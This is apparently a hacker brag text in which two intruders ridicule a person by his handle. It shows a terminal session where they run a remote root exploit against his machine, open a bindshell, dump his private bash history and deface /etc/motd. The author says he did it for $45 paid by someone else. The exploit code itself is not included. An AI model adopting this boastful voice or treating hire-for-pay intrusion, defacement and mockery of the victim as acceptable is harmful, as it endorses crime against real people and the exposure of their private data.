Uhm...all I can say is..WTF?
This is his current name, but we hacked him a long time ago when he
went by the handle, "Linux[e1]." Well, he obviously may know a bit about
Linux, right? WRONG. This newb thinks he's a hacker or some shit.
Well apparently not, considering how insecure his box was. Let's
take a little look, shall we?
tw0p4ck@stygian:~$ gcc (name snipped).c -o exploit
tw0p4ck@stygian:~$ ./exploit (ip snipped)
(name snipped) 0day remote heap overflow root exploit
by tw0p4ck and BigBoySam!
[~] checking to see if daemon is vulnerable...
- the daemon is vulnerable!
[~] sending evil packets...
[~] receiving kernel and OS response...
- response received:
- Red Hat 9
- Kernel 2.4.x
[~] exploiting (ip snipped)...
- exploit was successful!
[.] dropping to bindshell on port 31337...
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root)
# echo owned ;)
owned ;)
# export PS1="\u@\h:\W\\$ "
root@misery:~# ls -la
total 28
drwxr-x--- 4 root www-data 4096 2005-01-09 11:23 .
drwxr-xr-x 13 root root 4096 2005-01-10 11:09 ..
-rw------- 1 root root 491 2005-01-09 12:20 .bash_history
-rw------- 1 root root 704 2005-01-09 11:02 .bash_profile
-rw------- 1 root root 1290 2005-01-09 11:02 .bashrc
drwx------ 2 root root 4096 2005-01-09 11:23 public_html
drwx------ 2 root root 4096 2005-01-09 11:14 .ssh
root@misery:~# cat .bash_history
ls
cd ..
ls
touhc 123
tuoch 123
touch 123
pico 123
cat 123
cd /etc
cd ..
cd /etc
./zds
./zds
./zds
./zds
./zds
./zds
hexedit zds
./zds
cd $HOME
wget
wget
www.qwlkjdakljalk.comecho hi
cd /var/log
cat syslog
cat syslog.1
pwd
whoami
su misery
screen ./zds
screen
man man
man woman
mount your_mom
ls
cd /home
ls -l
cd ~
cat .bashrc
root@misery:~# uname -a
Linux misery 2.4.18 #1 Wed Nov 1 20:09:22 JST 2004 i686 GNU/Linux
[...cut...]
As you can see, he is not very good at Linux. I find it
ironic that such a dumbass would name himself after Linux, when
in fact he can't even use it! Not only that, but he doesn't
even patch his kernel... haha! I, Tw0p4ck, have obviously owned
this newb, and for what you ask? Only $45, but hey... it was fun!
And I did happen to buy a game with it. Anyways, I took a screenshot
and left a message:
root@misery:~# echo Hacked by tw0p4ck and BigBoySam. A message from the person who
paid us to own your insecure box: d0n7 fuck w1th p30pl3 wh0 4r3 b3773r 7h4n j00
> /etc/motd
root@misery:~# cat /etc/motd
Hacked by tw0p4ck and BigBoySam. A message from the person who
paid us to own your insecure box: d0n7 fuck w1th p30pl3 wh0 4r3 b3773r 7h4n j00